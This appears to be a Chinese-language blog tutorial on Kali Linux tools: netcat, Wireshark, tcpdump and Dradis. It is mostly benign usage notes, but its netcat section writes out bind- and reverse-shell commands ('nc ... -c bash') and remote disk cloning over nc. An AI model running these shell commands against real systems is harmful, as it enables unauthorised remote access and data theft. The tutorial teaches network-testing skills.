Kali 系统环境下有着不少非常实用的工具软件，对我们去测试网络和检测系统有很大的帮助。因为前一段时间我去备考建造师，所以有三个月没有更新了，这次我就多写一些。

  1、首先我来介绍一款网络工具NETCAT—NC

在网络工具中有“瑞士军刀”美誉的NetCat， 在我们用了N年了至今仍是爱不释手。

nc的作用
（1）实现任意TCP/UDP端口的侦听，nc可以作为server以TCP或UDP方式侦听指定端口
（2）端口的扫描，nc可以作为client发起TCP或UDP连接
（3）机器之间传输文件
（4）机器之间网络测速

• 命令 nc -vn 123.126.97.79 110

-vn:是以客户端去连接，不进行DNS解释

123.126.97.79 110：后面跟要探测的IP地址和端口号。如下，我们先找一下163邮箱的IP，然后去检测端口：

也可以连接80端口，我们测试MSF平台：

• 命令 NC—传输⽂本信息

A：nc -l -p 333  #服务器先打开一个侦听端口

   -p 333：设置端口号

 B：nc –nv 10.1.1.12 333  #作为客户端去连接

    10.1.1.12 333：服务器端的IP+端口号

• 远程电⼦取证信息收集

查看非常多的内容时，可以保存到一个文件里。-q 1：信息传输完成后1秒钟后自动退出。

• NC—传输⽂件/目录

传输文件

A：nc -lp 333 > 1.mp4       #正向传输

B：nc -nv 1.1.1.1 333 < 1.mp4 –q 1

或 A：nc -q 1 -lp 333 < a.mp4     #反向传输

B： nc -nv 1.1.1.1 333 > 2.mp4 

传输目录

A：tar -cvf - music/ | nc -lp 333 –q 1

B：nc -nv 1.1.1.1 333 | tar -xvf 

加密传文件

 A：nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

 B： mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

• NC—流媒体服务

A： cat 1.mp4 | nc -lp 333

B： nc -nv 10.1.1.13 333 | mplayer -vo x11 -cache 3000 

• NC—端⼝扫描

nc -nvz 192.168.58.20 1-65535    #-z：扫描要探测的TCP端口

nc –vnzu 192.168.58.20 1-1024    #-zu：扫描要探测的UDP端口

• NC—远程克隆硬盘

A： nc -lp 333 | dd of=/dev/sda    

B： dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1    

远程电⼦取证，可以将目标服务器硬盘远程复制，或者内存。

• NC——远程控制

正向： A：nc -lp 333 -c bash

B：nc 1.1.1.1 333

反向： A：nc -lp 333

B：nc 1.1.1.1 333 -c bash   #注：Windows⽤户把bash改成cmd；

• NC——NCAT

Nc缺乏加密和⾝份验证的能⼒ ，Ncat包含于nmap⼯具包中

A：ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl

B：ncat -nv 1.1.1.1 333 –ssl

    2、WIRESHARK抓包软件

Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包，并尽可能显示出最为详细的网络封包资料。

在这里我们先选中使用什么网卡来抓包，一定要选中混杂模式，这样才能抓取所有的数据包：

怎样去使用或者是利用Wireshark软件，我这里不详细的去说，因为这个软件太强大，所以还是自己去网上找相关的内容去看吧。但有几点我们要注意：

一个个的数据包查看效率不高，可以直接查看完整的数据流。对着其中一个数据包右键：

• 可以查看统计，去认识整个抓包里的详细数据：

• 可以去WIRESHARK网站去下载特定类型的数据去学习和判断问题。https://wiki.wireshark.org/SampleCaptures/

• 可以去查看专家信息，来分析问题：

  3、TCPDUMP抓包软件

它就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。非图形化工具，Linux、Unix系统默认安装。这个软件我是觉得一般的技术人员用的不多，这里只是了解一下就可以了。

• tcpdump -i eth0 -s 0 -w file.pcap #抓取eth0网卡数据包

• tcpdump -r file.pcap #读取刚才抓取的数据包文件

• tcpdump -n -r http.cap | awk '{print $3}'| sort –u #只显示文件中第三列的内容，并剔除重复项。

• tcpdump -n src host 145.254.160.237 -r http.cap #只显示源地址为254.160.237的数据包

• tcpdump -n port 53 -r http.cap #显示端口号为53的数据包

• tcpdump -A -n 'tcp[13] = 24' -r http.cap #高级筛选 显示TCP的第13号字节，数值等于24的数据包。

     4、Dradis过程文档记录

Dradis它是数据管理和报告工具。

• apt-get install dradis  #安装此软件
• 运行dradis软件

按上面红框内的地址，使用浏览器打开（第一次打开设置新密码）：

软件主界面：

其实这个软件具体怎么用其实我也不太清楚！！！

网上也很少有相关介绍文章，英语好的同学可以上外网去学习。

好了这期我做的时间确实有些长，但我这期的内容也是不少，希望各位看官能够满意。下期接着讲怎样使用Kali里面的工具进行网络中被动信息收集。